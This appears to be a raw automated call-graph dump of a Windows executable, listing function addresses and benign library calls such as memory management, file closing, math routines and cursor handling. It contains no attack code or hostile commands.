7ff62c0cb89c 9593->9597 9598 7ff62c0c37d0 18 API calls 9594->9598 9599 7ff62c0cbff7 9595->9599 9596 7ff62c0c37d0 18 API calls 9600 7ff62c0caa88 9596->9600 9601 7ff62c0c37d0 18 API calls 9597->9601 9602 7ff62c0cb2cd 9598->9602 9603 7ff62c0c37d0 18 API calls 9599->9603 9604 7ff62c0c37d0 18 API calls 9600->9604 9605 7ff62c0cb919 9601->9605 9606 7ff62c0c37d0 18 API calls 9602->9606 9607 7ff62c0cc074 9603->9607 9608 7ff62c0cab01 9604->9608 9609 7ff62c0c37d0 18 API calls 9605->9609 9610 7ff62c0cb34a 9606->9610 9611 7ff62c0c37d0 18 API calls 9607->9611 9612 7ff62c0c37d0 18 API calls 9608->9612 9614 7ff62c0cb99a 9609->9614 9615 7ff62c0c37d0 18 API calls 9610->9615 9616 7ff62c0cc0f1 9611->9616 9613 7ff62c0cab7e 9612->9613 9618 7ff62c0c37d0 18 API calls 9613->9618 9619 7ff62c0c37d0 18 API calls 9614->9619 9620 7ff62c0cb3c7 9615->9620 9617 7ff62c0c37d0 18 API calls 9616->9617 9621 7ff62c0cc16e 9617->9621 9622 7ff62c0cabfb 9618->9622 9623 7ff62c0cba17 9619->9623 9624 7ff62c0c37d0 18 API calls 9620->9624 9625 7ff62c0c37d0 18 API calls 9621->9625 9626 7ff62c0c37d0 18 API calls 9622->9626 9627 7ff62c0c37d0 18 API calls 9623->9627 9628 7ff62c0cb444 9624->9628 9629 7ff62c0cc1eb 9625->9629 9630 7ff62c0cac78 9626->9630 9631 7ff62c0cba94 9627->9631 9632 7ff62c0c37d0 18 API calls 9628->9632 9633 7ff62c0c37d0 18 API calls 9629->9633 9634 7ff62c0c37d0 18 API calls 9630->9634 9635 7ff62c0c37d0 18 API calls 9631->9635 9636 7ff62c0cb4be 9632->9636 9637 7ff62c0cc268 9633->9637 9638 7ff62c0cacf5 9634->9638 9639 7ff62c0cbb0e 9635->9639 9640 7ff62c0c37d0 18 API calls 9636->9640 9641 7ff62c0c37d0 18 API calls 9637->9641 9642 7ff62c0c37d0 18 API calls 9638->9642 9643 7ff62c0c37d0 18 API calls 9639->9643 9644 7ff62c0cb53b 9640->9644 9647 7ff62c0cc2e5 9641->9647 9648 7ff62c0cad72 9642->9648 9645 7ff62c0cbb8b 9643->9645 9646 7ff62c0c37d0 18 API calls 9644->9646 9649 7ff62c0c37d0 18 API calls 9645->9649 9650 7ff62c0cb5b8 9646->9650 9651 7ff62c0c37d0 18 API calls 9647->9651 9652 7ff62c0c37d0 18 API calls 9648->9652 9653 7ff62c0cbc08 9649->9653 9654 7ff62c0c37d0 18 API calls 9650->9654 9655 7ff62c0cc362 9651->9655 9656 7ff62c0cadef 9652->9656 9657 7ff62c0c37d0 18 API calls 9653->9657 9654->9553 9658 7ff62c0c37d0 18 API calls 9655->9658 9659 7ff62c0c37d0 18 API calls 9656->9659 9660 7ff62c0cbc85 9657->9660 9661 7ff62c0cc3df 9658->9661 9662 7ff62c0cae6c 9659->9662 9663 7ff62c0c37d0 18 API calls 9660->9663 9664 7ff62c0c37d0 18 API calls 9661->9664 9665 7ff62c0c37d0 18 API calls 9662->9665 9666 7ff62c0cbd08 9663->9666 9667 7ff62c0cc45c 9664->9667 9668 7ff62c0caee6 9665->9668 9669 7ff62c0c37d0 18 API calls 9666->9669 9670 7ff62c0c37d0 18 API calls 9667->9670 9671 7ff62c0c37d0 18 API calls 9668->9671 9673 7ff62c0cbd85 9669->9673 9674 7ff62c0cc4d9 9670->9674 9672 7ff62c0caf63 9671->9672 9676 7ff62c0c37d0 18 API calls 9672->9676 9677 7ff62c0c37d0 18 API calls 9673->9677 9675 7ff62c0c37d0 18 API calls 9674->9675 9675->9554 9676->9552 9677->9567 9679 7ff62c0a678f 9678->9679 9680 7ff62c0a67cd 9678->9680 9679->9680 10314 7ff62c0b2720 9679->10314 9696 7ff62c0a680a 9680->9696 9730 7ff62c0a6d49 9680->9730 10330 7ff62c0b1580 9680->10330 9681 7ff62c0a6877 9683 7ff62c0a68b4 9681->9683 9687 7ff62c0a68a1 free 9681->9687 9688 7ff62c0a68ec 9683->9688 9689 7ff62c0a68d9 free 9683->9689 9687->9683 9690 7ff62c0a6924 9688->9690 9692 7ff62c0a6911 free 9688->9692 9689->9688 9693 7ff62c0a6963 9690->9693 9694 7ff62c0a6950 free 9690->9694 9692->9690 9695 7ff62c0a699b 9693->9695 9698 7ff62c0a6988 free 9693->9698 9694->9693 9699 7ff62c0a69fd 9695->9699 9700 7ff62c0a69ea free 9695->9700 9696->9681 9697 7ff62c0a685a free 9696->9697 10340 7ff62c0b2870 9696->10340 9697->9696 9698->9695 9701 7ff62c0a6a35 9699->9701 9702 7ff62c0a6a22 free 9699->9702 9700->9699 9703 7ff62c0a6a6d 9701->9703 9704 7ff62c0a6a5a free 9701->9704 9702->9701 9705 7ff62c0a6aa5 9703->9705 9706 7ff62c0a6a92 free 9703->9706 9704->9703 9707 7ff62c0a6add 9705->9707 9708 7ff62c0a6aca free 9705->9708 9706->9705 9709 7ff62c0a6b27 9707->9709 9710 7ff62c0a6b0e free 9707->9710 9708->9707 10356 7ff62c0bae10 9709->10356 9710->9707 9713 7ff62c0a6b6b 9715 7ff62c0a6ba3 9713->9715 9716 7ff62c0a6b90 free 9713->9716 9714 7ff62c0a6b58 free 9714->9713 9717 7ff62c0a6bdb 9715->9717 9718 7ff62c0a6bc8 free 9715->9718 9716->9715 9719 7ff62c0a6c00 free 9717->9719 9722 7ff62c0a6c13 9717->9722 9718->9717 9719->9722 9720 7ff62c0a6c6c 9721 7ff62c0a6ca9 9720->9721 9723 7ff62c0a6c96 free 9720->9723 9724 7ff62c0a6ce1 9721->9724 9728 7ff62c0a6cce free 9721->9728 9722->9720 9727 7ff62c0a6c52 free 9722->9727 9723->9721 9725 7ff62c0a6d11 9724->9725 9726 7ff62c0a6cea __acrt_iob_func 9724->9726 9725->9730 9731 7ff62c0a6d36 free 9725->9731 9726->9725 9729 7ff62c0a6d01 fclose 9726->9729 9727->9722 9728->9724 9729->9725 9730->9307 9732 7ff62c0b29b0 9730->9732 9731->9730 9733 7ff62c0b29e4 9732->9733 9734 7ff62c0b29c5 free 9732->9734 9736 7ff62c0b2a0f 9733->9736 9737 7ff62c0b2a02 free 9733->9737 9734->9733 9738 7ff62c0b2a3a 9736->9738 9739 7ff62c0b2a2d free 9736->9739 9737->9736 9740 7ff62c0b2a65 9738->9740 9742 7ff62c0b2a58 free 9738->9742 9739->9738 9741 7ff62c0b2a90 9740->9741 9743 7ff62c0b2a83 free 9740->9743 9744 7ff62c0c01e0 6 API calls 9741->9744 9742->9740 9743->9741 9745 7ff62c0b2a9c 9744->9745 10435 7ff62c0a2590 9745->10435 9748 7ff62c0b2ad4 9750 7ff62c0b2aff 9748->9750 9752 7ff62c0b2af2 free 9748->9752 9749 7ff62c0b2ac7 free 9749->9748 10443 7ff62c0b1e30 9750->10443 9752->9750 9754 7ff62c0b2b37 9756 7ff62c0a1a20 16 API calls 9754->9756 9755 7ff62c0b2b2a free 9755->9754 9757 7ff62c0b2b43 9756->9757 9758 7ff62c0b2baa free 9757->9758 9759 7ff62c0b2bb7 9757->9759 9758->9759 9760 7ff62c0b2bd5 free 9759->9760 9761 7ff62c0b2be2 9759->9761 9760->9761 9762 7ff62c0b2c0d 9761->9762 9763 7ff62c0b2c00 free 9761->9763 9764 7ff62c0b2c38 9762->9764 9765 7ff62c0b2c2b free 9762->9765 9763->9762 9766 7ff62c0b2c63 9764->9766 9767 7ff62c0b2c56 free 9764->9767 9765->9764 9768 7ff62c0b2c8e 9766->9768 9769 7ff62c0b2c81 free 9766->9769 9767->9766 9770 7ff62c0b2cb9 9768->9770 9771 7ff62c0b2cac free 9768->9771 9769->9768 9772 7ff62c0b2ce4 9770->9772 9773 7ff62c0b2cd7 free 9770->9773 9771->9770 9774 7ff62c0b2d0f 9772->9774 9775 7ff62c0b2d02 free 9772->9775 9773->9772 9776 7ff62c0b2d3a free 9774->9776 9777 7ff62c0b2d2d free 9774->9777 9775->9774 9776->9307 9777->9776 9779 7ff62c0c2c55 9778->9779 9780 7ff62c0c2de8 9778->9780 9779->9780 9781 7ff62c0c2dd4 GetCapture 9779->9781 9780->9295 9780->9297 9780->9298 9781->9780 9782 7ff62c0c2ddf SetCapture 9781->9782 9782->9780 9784 7ff62c0c299a 9783->9784 9787 7ff62c0c2a83 9783->9787 10455 7ff62c0be110 9784->10455 9787->9295 9788 7ff62c0c2a60 memcpy 9788->9787 9788->9788 9790 7ff62c0c2ae1 9789->9790 9792 7ff62c0c2ae8 9789->9792 9790->9508 9791 7ff62c0c2bf2 SetCursor 9791->9508 9792->9791 9793 7ff62c0c2b05 LoadCursorA SetCursor 9792->9793 9793->9508 9796 7ff62c0bdf25 9795->9796 9797 7ff62c0bde9d 9795->9797 9796->9513 9935 7ff62c0bd140 9797->9935 9802 7ff62c0b2200 3 API calls 9802->9796 9804 7ff62c0c380d 9803->9804 9808 7ff62c0c383f 9803->9808 9964 7ff62c0a2dc0 9804->9964 9808->9518 9808->9519 9810 7ff62c0b21b9 9809->9810 9811 7ff62c0b2122 9809->9811 9816 7ff62c0c3de0 9810->9816 9811->9810 9812 7ff62c0b215c malloc 9811->9812 9812->9810 9813 7ff62c0b217f memcpy 9812->9813 9814 7ff62c0b21ad free 9813->9814 9815 7ff62c0b219b 9813->9815 9814->9810 9815->9814 9817 7ff62c0c4172 9816->9817 9818 7ff62c0c3e2b 9816->9818 9817->9523 9818->9817 10006 7ff62c0c3850 9818->10006 9820 7ff62c0c3ffb 10017 7ff62c0a3ff0 9820->10017 9822 7ff62c0c4074 10025 7ff62c0a3c50 9822->10025 9827 7ff62c0b1050 7 API calls 9827->9817 9829 7ff62c0a7bf7 9828->9829 9830 7ff62c0a7cc4 9829->9830 9831 7ff62c0a7cdb 9829->9831 10119 7ff62c0a2d40 9830->10119 9833 7ff62c0a2d40 __stdio_common_vsprintf 9831->9833 9834 7ff62c0a7cd9 9833->9834 9835 7ff62c0a7d48 9834->9835 9837 7ff62c0ac510 2 API calls 9834->9837 9836 7ff62c0cf650 8 API calls 9835->9836 9838 7ff62c0a7def 9836->9838 9837->9835 9838->9563 9840 7ff62c0c3de0 42 API calls 9839->9840 9841 7ff62c0c6c2a 9840->9841 9842 7ff62c0c6cf0 9841->9842 9843 7ff62c0c6c48 9841->9843 9844 7ff62c0bd930 21 API calls 9842->9844 9845 7ff62c0bd930 21 API calls 9843->9845 9846 7ff62c0c6cd0 9844->9846 9845->9846 9847 7ff62c0bd930 21 API calls 9846->9847 9848 7ff62c0c6de9 9847->9848 9849 7ff62c0c5330 9848->9849 9852 7ff62c0c5398 9849->9852 9853 7ff62c0c5391 9849->9853 9850 7ff62c0cf650 8 API calls 9851 7ff62c0c58d8 9850->9851 9851->9596 9852->9853 9854 7ff62c0c5613 strchr 9852->9854 9853->9850 9855 7ff62c0c5634 9854->9855 9861 7ff62c0c5656 9854->9861 9856 7ff62c0c563f strchr 9855->9856 9855->9861 9856->9855 9856->9861 9857 7ff62c0c571a 9858 7ff62c0a2d40 __stdio_common_vsprintf 9857->9858 9859 7ff62c0c5773 9858->9859 9862 7ff62c0a2d40 __stdio_common_vsprintf 9859->9862 9860 7ff62c0ac510 2 API calls 9860->9857 9861->9857 9861->9860 9864 7ff62c0c57a0 9862->9864 10124 7ff62c0c4b00 9864->10124 9866 7ff62c0a36c0 15 API calls 9866->9853 9868 7ff62c0a7e3d 9867->9868 9871 7ff62c0a7e47 9867->9871 9869 7ff62c0ac370 41 API calls 9868->9869 9870 7ff62c0a7e42 9869->9870 9870->9560 9872 7ff62c0ac370 41 API calls 9871->9872 9873 7ff62c0a7eac 9872->9873 9873->9870 9874 7ff62c0a3ff0 26 API calls 9873->9874 9875 7ff62c0a7f3f 9874->9875 9875->9870 9876 7ff62c0a3ff0 26 API calls 9875->9876 9876->9870 9878 7ff62c0ac395 9877->9878 9880 7ff62c0ac39a 9877->9880 10156 7ff62c0b0a30 9878->10156 9883 7ff62c0ac478 9880->9883 10163 7ff62c0b0fb0 9880->10163 9882 7ff62c0ac3e1 9884 7ff62c0ac40e 9882->9884 9885 7ff62c0ac3ea __acrt_iob_func 9882->9885 9883->9515 9884->9883 9888 7ff62c0ac468 free 9884->9888 9886 7ff62c0ac400 fflush 9885->9886 9887 7ff62c0ac408 fclose 9885->9887 9886->9884 9887->9884 9888->9883 9890 7ff62c0a70bf 9889->9890 9902 7ff62c0a7462 9889->9902 9891 7ff62c0ac370 41 API calls 9890->9891 9892 7ff62c0a714c 9891->9892 9895 7ff62c0a715b 9892->9895 10197 7ff62c0b0610 9892->10197 9894 7ff62c0a73e4 9896 7ff62c0a740b 9894->9896 9897 7ff62c0b2200 3 API calls 9894->9897 9899 7ff62c0a71e2 9895->9899 9900 7ff62c0a71b1 9895->9900 10205 7ff62c0b0ef0 9895->10205 9898 7ff62c0b2200 3 API calls 9896->9898 9897->9896 9905 7ff62c0a741c 9898->9905 9899->9894 9906 7ff62c0a7249 9899->9906 10220 7ff62c0a50b0 9899->10220 9900->9899 10208 7ff62c0acc60 9900->10208 9902->9558 9909 7ff62c0a7530 9902->9909 9905->9902 10229 7ff62c0a6db0 9905->10229 9906->9894 10223 7ff62c0acd10 9906->10223 9910 7ff62c0a7561 9909->9910 9911 7ff62c0a7566 9909->9911 9912 7ff62c0a70a0 60 API calls 9910->9912 9913 7ff62c0b2200 3 API calls 9911->9913 9917 7ff62c0a75bf 9911->9917 9912->9911 9913->9911 9914 7ff62c0a7702 9915 7ff62c0a7746 9914->9915 9916 7ff62c0a770d memcpy 9914->9916 9925 7ff62c0a7778 9915->9925 10288 7ff62c0c12e0 9915->10288 9916->9915 9919 7ff62c0a772d 9916->9919 9920 7ff62c0a767d 9917->9920 10282 7ff62c0a6e90 9917->10282 9918 7ff62c0a76c8 9918->9914 9921 7ff62c0b2200 3 API calls 9918->9921 9922 7ff62c0b2200 3 API calls 9919->9922 9920->9918 9924 7ff62c0a6e90 3 API calls 9920->9924 9921->9914 9922->9915 9924->9920 9927 7ff62c0a77d7 9925->9927 9928 7ff62c0b2200 3 API calls 9925->9928 9929 7ff62c0c20b0 9927->9929 9928->9927 9930 7ff62c0c23b8 9929->9930 9933 7ff62c0c20e5 9929->9933 9931 7ff62c0cf650 8 API calls 9930->9931 9932 7ff62c0c2972 9931->9932 9932->9558 9933->9930 9934 7ff62c0c2381 memcpy 9933->9934 9934->9930 9934->9933 9936 7ff62c0bd1c5 9935->9936 9937 7ff62c0bd17c 9935->9937 9938 7ff62c0b2200 3 API calls 9936->9938 9937->9936 9940 7ff62c0bd17e 9937->9940 9942 7ff62c0bd1e9 9938->9942 9939 7ff62c0bd220 cosf sinf 9939->9942 9941 7ff62c0b2200 3 API calls 9940->9941 9943 7ff62c0bd1b0 9940->9943 9941->9943 9942->9939 9942->9943 9944 7ff62c0b2200 3 API calls 9942->9944 9945 7ff62c0bc910 9943->9945 9944->9942 9946 7ff62c0bc995 9945->9946 9957 7ff62c0bcca9 9945->9957 9947 7ff62c0bc9ae 9946->9947 9948 7ff62c0bcec6 9946->9948 9959 7ff62c0bb730 9947->9959 9951 7ff62c0bb730 6 API calls 9948->9951 9949 7ff62c0cf650 8 API calls 9952 7ff62c0bcf6b 9949->9952 9951->9957 9952->9796 9952->9802 9953 7ff62c0bcaeb sqrtf 9955 7ff62c0bc9d3 9953->9955 9954 7ff62c0bcb60 sqrtf 9954->9955 9955->9953 9955->9954 9956 7ff62c0bcbd6 sqrtf 9955->9956 9955->9957 9958 7ff62c0bcc4c sqrtf 9955->9958 9956->9955 9957->9949 9958->9955 9960 7ff62c0c1f10 3 API calls 9959->9960 9961 7ff62c0bb772 9960->9961 9962 7ff62c0bb7b5 9961->9962 9963 7ff62c0b2680 3 API calls 9961->9963 9962->9955 9963->9962 9982 7ff62c0a1b80 9964->9982 9966 7ff62c0a2de5 __stdio_common_vsprintf 9967 7ff62c0a2e1d 9966->9967 9968 7ff62c0c3020 9967->9968 9969 7ff62c0c305b 9968->9969 9971 7ff62c0c3355 9968->9971 9970 7ff62c0c30f4 9969->9970 9980 7ff62c0c3476 9969->9980 9970->9971 9972 7ff62c0c3178 memchr 9970->9972 9976 7ff62c0c319e 9970->9976 9971->9808 9972->9970 9972->9976 9973 7ff62c0c3234 memchr 9973->9976 9974 7ff62c0c3307 9974->9971 9975 7ff62c0c3330 memchr 9974->9975 9975->9971 9975->9975 9976->9971 9976->9973 9976->9974 9983 7ff62c0a36c0 9976->9983 9978 7ff62c0c376b 9978->9971 10001 7ff62c0b1050 9978->10001 9980->9971 9980->9978 9989 7ff62c0c0c10 9980->9989 9982->9966 9986 7ff62c0a36f8 9983->9986 9984 7ff62c0a3848 9984->9976 9985 7ff62c0a382f 9985->9984 9987 7ff62c0b1050 7 API calls 9985->9987 9986->9984 9986->9985 9988 7ff62c0c0c10 8 API calls 9986->9988 9987->9984 9988->9985 9990 7ff62c0c0c61 9989->9990 9992 7ff62c0c0d58 memchr 9990->9992 9995 7ff62c0c0d8e 9990->9995 9997 7ff62c0c1253 9990->9997 9991 7ff62c0c0de4 9993 7ff62c0bb730 6 API calls 9991->9993 9991->9997 9992->9990 10000 7ff62c0c0e26 9993->10000 9994 7ff62c0c0dba memchr 9994->9995 9995->9991 9995->9994 9996 7ff62c0c1f10 3 API calls 9998 7ff62c0c121e 9996->9998 9997->9978 9998->9997 9999 7ff62c0b2680 3 API calls 9998->9999 9999->9997 10000->9996 10005 7ff62c0b107e 10001->10005 10002 7ff62c0b1110 memchr 10002->10005 10003 7ff62c0b1185 10003->9971 10004 7ff62c0b0fb0 6 API calls 10004->10005 10005->10002 10005->10003 10005->10004 10007 7ff62c0c3890 10006->10007 10008 7ff62c0c38f0 10006->10008 10007->9820 10009 7ff62c0c3a2f 10008->10009 10039 7ff62c0ac510 10008->10039 10010 7ff62c0c3acc 10009->10010 10012 7ff62c0c3a6b 10009->10012 10013 7ff62c0ac510 2 API calls 10009->10013 10014 7ff62c0c3b43 10010->10014 10015 7ff62c0ac510 2 API calls 10010->10015 10012->9820 10013->10010 10014->10012 10045 7ff62c0a7a20 10014->10045 10015->10014 10018 7ff62c0a429d 10017->10018 10019 7ff62c0a4018 10017->10019 10018->9822 10019->10018 10021 7ff62c0a4154 10019->10021 10024 7ff62c0a4200 10019->10024 10050 7ff62c0bb300 10019->10050 10054 7ff62c0bd7f0 10021->10054 10022 7ff62c0bd7f0 23 API calls 10022->10018 10024->10018 10024->10022 10108 7ff62c0bd930 10025->10108 10027 7ff62c0a3dd9 10027->9817 10032 7ff62c0a3870 10027->10032 10028 7ff62c0a3cad 10028->10027 10029 7ff62c0bd7f0 23 API calls 10028->10029 10030 7ff62c0a3d7d 10029->10030 10031 7ff62c0bd7f0 23 API calls 10030->10031 10031->10027 10033 7ff62c0a38db 10032->10033 10034 7ff62c0a3bc0 10033->10034 10037 7ff62c0a3aa6 10033->10037 10035 7ff62c0a3b8a 10034->10035 10036 7ff62c0c0c10 8 API calls 10034->10036 10035->9817 10035->9827 10036->10035 10037->10035 10038 7ff62c0c0c10 8 API calls 10037->10038 10038->10035 10040 7ff62c0ac52f 10039->10040 10041 7ff62c0ac61b memcpy 10040->10041 10042 7ff62c0ac619 10040->10042 10044 7ff62c0ac6a6 10040->10044 10041->10042 10043 7ff62c0ac6b1 memcpy 10042->10043 10042->10044 10043->10044 10044->10009 10048 7ff62c0a7a43 10045->10048 10046 7ff62c0a7a45 10046->10012 10047 7ff62c0a7ade 10047->10012 10048->10046 10048->10047 10049 7ff62c0a7a9d fmodf 10048->10049 10049->10012 10052 7ff62c0bb34c 10050->10052 10051 7ff62c0bb3fe 10052->10051 10053 7ff62c0c2010 3 API calls 10052->10053 10053->10051 10055 7ff62c0bd7fd 10054->10055 10059 7ff62c0bd910 10054->10059 10062 7ff62c0bd300 10055->10062 10059->10024 10061 7ff62c0b2200 3 API calls 10061->10059 10063 7ff62c0bd355 10062->10063 10065 7ff62c0bd509 10063->10065 10073 7ff62c0bd3d9 10063->10073 10064 7ff62c0bd5e4 10068 7ff62c0bd4f9 10064->10068 10071 7ff62c0b2200 3 API calls 10064->10071 10066 7ff62c0b2200 3 API calls 10065->10066 10067 7ff62c0bd548 10065->10067 10066->10067 10069 7ff62c0b2200 3 API calls 10067->10069 10070 7ff62c0bd5a0 10067->10070 10081 7ff62c0bb930 10068->10081 10069->10070 10070->10064 10072 7ff62c0b2200 3 API calls 10070->10072 10071->10068 10072->10064 10099 7ff62c0bcfc0 10073->10099 10076 7ff62c0bcfc0 3 API calls 10077 7ff62c0bd486 10076->10077 10078 7ff62c0bcfc0 3 API calls 10077->10078 10079 7ff62c0bd4be 10078->10079 10080 7ff62c0bcfc0 3 API calls 10079->10080 10080->10068 10082 7ff62c0bb9ca 10081->10082 10096 7ff62c0bbe11 10081->10096 10084 7ff62c0bc65f 10082->10084 10085 7ff62c0bba17 10082->10085 10083 7ff62c0cf650 8 API calls 10086 7ff62c0bc89f 10083->10086 10087 7ff62c0bb730 6 API calls 10084->10087 10088 7ff62c0bb730 6 API calls 10085->10088 10086->10059 10086->10061 10090 7ff62c0bc674 10087->10090 10089 7ff62c0bba50 10088->10089 10092 7ff62c0bbd38 10089->10092 10093 7ff62c0bbb4b sqrtf 10089->10093 10095 7ff62c0bbbd4 sqrtf 10089->10095 10097 7ff62c0bbc60 sqrtf 10089->10097 10098 7ff62c0bbce9 sqrtf 10089->10098 10091 7ff62c0bc708 sqrtf 10090->10091 10090->10096 10091->10090 10094 7ff62c0bbdca sqrtf 10092->10094 10092->10096 10093->10089 10094->10092 10095->10089 10096->10083 10097->10089 10098->10089 10100 7ff62c0bcff1 10099->10100 10101 7ff62c0bd007 10100->10101 10103 7ff62c0bd0c8 10100->10103 10102 7ff62c0b2200 3 API calls 10101->10102 10105 7ff62c0bd020 10102->10105 10104 7ff62c0b2200 3 API calls 10103->10104 10106 7ff62c0bd0c6 10103->10106 10104->10106 10105->10106 10107 7ff62c0b2200 3 API calls 10105->10107 10106->10076 10107->10105 10109 7ff62c0bd9b7 10108->10109 10110 7ff62c0bd93d 10108->10110 10109->10028 10111 7ff62c0bd9c6 10110->10111 10112 7ff62c0bd96b 10110->10112 10113 7ff62c0bb730 6 API calls 10111->10113 10114 7ff62c0bd300 3 API calls 10112->10114 10113->10109 10115 7ff62c0bd978 10114->10115 10116 7ff62c0bc910 18 API calls 10115->10116 10117 7ff62c0bd991 10116->10117 10117->10109 10118 7ff62c0b2200 3 API calls 10117->10118 10118->10109 10123 7ff62c0a1b80 10119->10123 10121 7ff62c0a2d65 __stdio_common_vsprintf 10122 7ff62c0a2d9a 10121->10122 10122->9834 10123->10121 10125 7ff62c0c4bf9 10124->10125 10146 7ff62c0bd670 10125->10146 10128 7ff62c0c4cf1 powf powf 10129 7ff62c0c4d3c 10128->10129 10130 7ff62c0c4e30 10129->10130 10131 7ff62c0c4ddf powf 10129->10131 10132 7ff62c0c4dac powf 10129->10132 10134 7ff62c0c4e9f 10129->10134 10130->10134 10136 7ff62c0c4e59 powf 10130->10136 10137 7ff62c0c4e4b 10130->10137 10131->10130 10132->10130 10133 7ff62c0c4f2c 10138 7ff62c0bd670 23 API calls 10133->10138 10144 7ff62c0c50df 10133->10144 10134->10133 10140 7ff62c0c4f96 powf 10134->10140 10139 7ff62c0c4e72 fmodf 10136->10139 10137->10139 10142 7ff62c0c50d2 10138->10142 10139->10134 10140->10133 10141 7ff62c0c52d9 10141->9853 10141->9866 10143 7ff62c0bd670 23 API calls 10142->10143 10142->10144 10143->10144 10144->10141 10144->10144 10145 7ff62c0c0c10 8 API calls 10144->10145 10145->10141 10147 7ff62c0bd7cb 10146->10147 10150 7ff62c0bd67d 10146->10150 10147->10128 10147->10129 10148 7ff62c0bd707 10149 7ff62c0bd76c 10148->10149 10153 7ff62c0b2200 3 API calls 10148->10153 10151 7ff62c0bb930 20 API calls 10149->10151 10150->10148 10152 7ff62c0b2200 3 API calls 10150->10152 10154 7ff62c0bd7a7 10151->10154 10152->10148 10153->10149 10154->10147 10155 7ff62c0b2200 3 API calls 10154->10155 10155->10147 10157 7ff62c0b0a85 10156->10157 10170 7ff62c0bb4b0 10157->10170 10159 7ff62c0c3850 3 API calls 10160 7ff62c0b0ab5 10159->10160 10160->10159 10161 7ff62c0bd670 23 API calls 10160->10161 10162 7ff62c0b0d78 10160->10162 10161->10160 10162->9880 10164 7ff62c0b1031 10163->10164 10165 7ff62c0b0fdb 10163->10165 10164->9882 10166 7ff62c0b101f 10165->10166 10167 7ff62c0b0ff3 10165->10167 10179 7ff62c0a35a0 10166->10179 10169 7ff62c0b0ff8 __stdio_common_vfprintf 10167->10169 10169->9882 10172 7ff62c0bb4c6 10170->10172 10173 7ff62c0bb67b 10170->10173 10171 7ff62c0bb5a9 10175 7ff62c0b2680 3 API calls 10171->10175 10177 7ff62c0bb5db 10171->10177 10172->10171 10174 7ff62c0b25e0 3 API calls 10172->10174 10173->10160 10174->10171 10175->10177 10176 7ff62c0bb631 memcpy 10176->10177 10177->10173 10177->10176 10178 7ff62c0bb653 memcpy 10177->10178 10178->10177 10189 7ff62c0a1b80 10179->10189 10181 7ff62c0a35bc __stdio_common_vsprintf 10182 7ff62c0a35f3 10181->10182 10187 7ff62c0a3669 10181->10187 10186 7ff62c0a3622 10182->10186 10190 7ff62c0b24b0 10182->10190 10184 7ff62c0a364c 10185 7ff62c0a2dc0 __stdio_common_vsprintf 10184->10185 10185->10187 10186->10184 10188 7ff62c0b24b0 3 API calls 10186->10188 10187->10164 10188->10184 10189->10181 10191 7ff62c0b2529 10190->10191 10192 7ff62c0b24c5 malloc 10190->10192 10191->10186 10192->10191 10194 7ff62c0b24f7 memcpy 10192->10194 10195 7ff62c0b251d free 10194->10195 10196 7ff62c0b250b 10194->10196 10195->10191 10196->10195 10198 7ff62c0b0632 10197->10198 10202 7ff62c0b086f 10197->10202 10237 7ff62c0b2000 10198->10237 10200 7ff62c0b0865 10201 7ff62c0ac370 41 API calls 10200->10201 10201->10202 10202->9895 10203 7ff62c0b0756 10203->10200 10244 7ff62c0c5900 10203->10244 10206 7ff62c0b0f95 10205->10206 10207 7ff62c0b0f75 free 10205->10207 10206->9900 10207->10206 10209 7ff62c0acc93 10208->10209 10210 7ff62c0acc9a 10208->10210 10264 7ff62c0aca30 10209->10264 10275 7ff62c0acb30 10210->10275 10213 7ff62c0acc98 10214 7ff62c0accf5 10213->10214 10216 7ff62c0a2dc0 __stdio_common_vsprintf 10213->10216 10215 7ff62c0ac370 41 API calls 10214->10215 10218 7ff62c0accff 10215->10218 10217 7ff62c0accdc 10216->10217 10219 7ff62c0c3020 18 API calls 10217->10219 10218->9899 10219->10214 10221 7ff62c0ac510 2 API calls 10220->10221 10222 7ff62c0a50c9 10221->10222 10222->9906 10225 7ff62c0ace44 10223->10225 10226 7ff62c0acd37 10223->10226 10224 7ff62c0ac510 2 API calls 10227 7ff62c0ace0b 10224->10227 10225->9894 10226->10224 10226->10225 10227->10225 10228 7ff62c0b25e0 3 API calls 10227->10228 10228->10225 10230 7ff62c0a6df4 10229->10230 10231 7ff62c0a6dcb 10229->10231 10232 7ff62c0a6e71 10230->10232 10233 7ff62c0a6e1b qsort 10230->10233 10235 7ff62c0a6e38 10230->10235 10234 7ff62c0b2200 3 API calls 10231->10234 10232->9905 10233->10235 10234->10230 10235->10232 10236 7ff62c0a6db0 3 API calls 10235->10236 10236->10235 10238 7ff62c0b2022 10237->10238 10241 7ff62c0b20b9 10237->10241 10239 7ff62c0b205c malloc 10238->10239 10238->10241 10240 7ff62c0b207f memcpy 10239->10240 10239->10241 10242 7ff62c0b20ad free 10240->10242 10243 7ff62c0b209b 10240->10243 10241->10203 10242->10241 10243->10242 10245 7ff62c0c595a 10244->10245 10250 7ff62c0c5eb6 10244->10250 10246 7ff62c0c3850 3 API calls 10245->10246 10245->10250 10249 7ff62c0c5c6c 10246->10249 10247 7ff62c0c5d9f 10248 7ff62c0a3870 8 API calls 10247->10248 10256 7ff62c0c5e2e 10247->10256 10251 7ff62c0c5e16 10248->10251 10249->10247 10252 7ff62c0bd930 21 API calls 10249->10252 10250->10203 10253 7ff62c0b1050 7 API calls 10251->10253 10251->10256 10254 7ff62c0c5d8d 10252->10254 10253->10256 10255 7ff62c0a3ff0 26 API calls 10254->10255 10255->10247 10256->10250 10258 7ff62c0ace70 10256->10258 10259 7ff62c0ace94 10258->10259 10260 7ff62c0ac510 2 API calls 10259->10260 10261 7ff62c0acec5 10260->10261 10262 7ff62c0acefd 10261->10262 10263 7ff62c0b25e0 3 API calls 10261->10263 10262->10250 10263->10262 10265 7ff62c0acae0 10264->10265 10266 7ff62c0aca57 10264->10266 10267 7ff62c0a2d40 __stdio_common_vsprintf 10265->10267 10268 7ff62c0acb30 9 API calls 10266->10268 10272 7ff62c0acafd 10267->10272 10269 7ff62c0acace 10268->10269 10270 7ff62c0cf650 8 API calls 10269->10270 10271 7ff62c0acadb 10270->10271 10271->10213 10273 7ff62c0cf650 8 API calls 10272->10273 10274 7ff62c0acb1c 10273->10274 10274->10213 10276 7ff62c0a2d40 __stdio_common_vsprintf 10275->10276 10280 7ff62c0acb70 10276->10280 10277 7ff62c0acc2e 10278 7ff62c0cf650 8 API calls 10277->10278 10279 7ff62c0acc4d 10278->10279 10279->10213 10280->10277 10281 7ff62c0a2d40 __stdio_common_vsprintf 10280->10281 10281->10277 10283 7ff62c0a6f18 10282->10283 10284 7ff62c0a6ec0 10282->10284 10285 7ff62c0a6f70 10283->10285 10287 7ff62c0a6e90 3 API calls 10283->10287 10284->10283 10286 7ff62c0b2200 3 API calls 10284->10286 